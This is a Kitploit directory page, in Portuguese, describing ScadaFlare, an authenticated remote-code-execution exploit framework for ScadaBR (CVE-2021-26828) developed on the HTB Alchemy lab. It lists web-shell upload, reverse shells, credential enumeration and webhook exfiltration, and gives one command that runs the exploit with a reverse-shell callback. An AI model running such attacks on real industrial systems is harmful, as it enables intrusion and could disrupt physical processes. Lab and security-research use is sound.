Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework de Exploração de RCE Autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Ferramentas/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoSegurança SCADA/ICSExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework de Exploração de RCE Autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

5há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

ScadaFlare - Toolkit de Exploração de RCE Autenticado CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Um exploit modular de RCE pós-autenticação voltado para ScadaBR <1.1.0, aprimorado para operações de red team.

ScadaFlare Demo

Recursos

  • Faz upload de shell .jsp armamentizada via view_edit.shtm
  • Suporta payloads Linux e Windows
  • Suporte a proxy SOCKS5 / HTTP
  • Gatilho de reverse shell (padrão ou base64)
  • Módulos de enumeração (DB, credenciais, Log4Shell, etc.)
  • Exfiltração via webhook (Slack / Discord)
  • Geração de script de recurso do Metasploit
  • Suporte a limpeza (kill switch)

Mapeamento de Técnicas MITRE ATT&CK

CVE

  • CVE-2021-26828
  • Descoberto por Fellipe Oliveira
  • Exploit aprimorado e modularizado

Por Que Isso Existe

Este exploit foi desenvolvido durante a análise do cenário HTB Pro Lab: Alchemy. O PoC original de Fellipe Oliveira era sólido, mas:

Escrito em Python 2

Não tinha recursos modernos como suporte a proxy, limpeza de shell e encadeamento de enumeração

Era difícil de estender ou integrar a fluxos de trabalho de red team

Esta versão, ScadaFlare, é uma reescrita completa em Python 3 com suporte modular, múltiplas estratégias de evasão, substituição de detecção de SO, integração com webhook, suporte a proxy SOCKS e cadeias de enumeração para uso por operadores no mundo real.

Uso

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Apenas Uso Legal e Ético

ScadaFlare foi projetado exclusivamente para:

  • Educação em hacking ético
  • Testes em laboratório SCADA
  • Pesquisa defensiva e validação de vulnerabilidades

O uso não autorizado contra sistemas industriais reais pode:

  • Interromper processos físicos
  • Causar danos ou riscos de segurança
  • Resultar em graves consequências legais

Ao usar esta ferramenta, você aceita total responsabilidade por:

  • Obter autorização explícita por escrito
  • Operar apenas em ambientes aprovados

Licença

Licença MIT – consulte LICENSE

Baixar ferramenta
FaseTécnicaID
Acesso Inicial (pós-autenticação)Contas VálidasT1078
ExecuçãoExplorar Aplicativo Exposto PublicamenteT1190
Execução de ComandosWeb ShellT1505.003
Ações de PrivilégioModificar Conteúdo WebT1505
Acesso a CredenciaisCredencial em Arquivos de ConfiguraçãoT1552.001
DescobertaDescoberta de Sistema RemotoT1018
ExfiltraçãoExfiltração Via Serviço WebT1567.002
Evasão de DefesaTunelamento de Proxy e ProtocoloT1090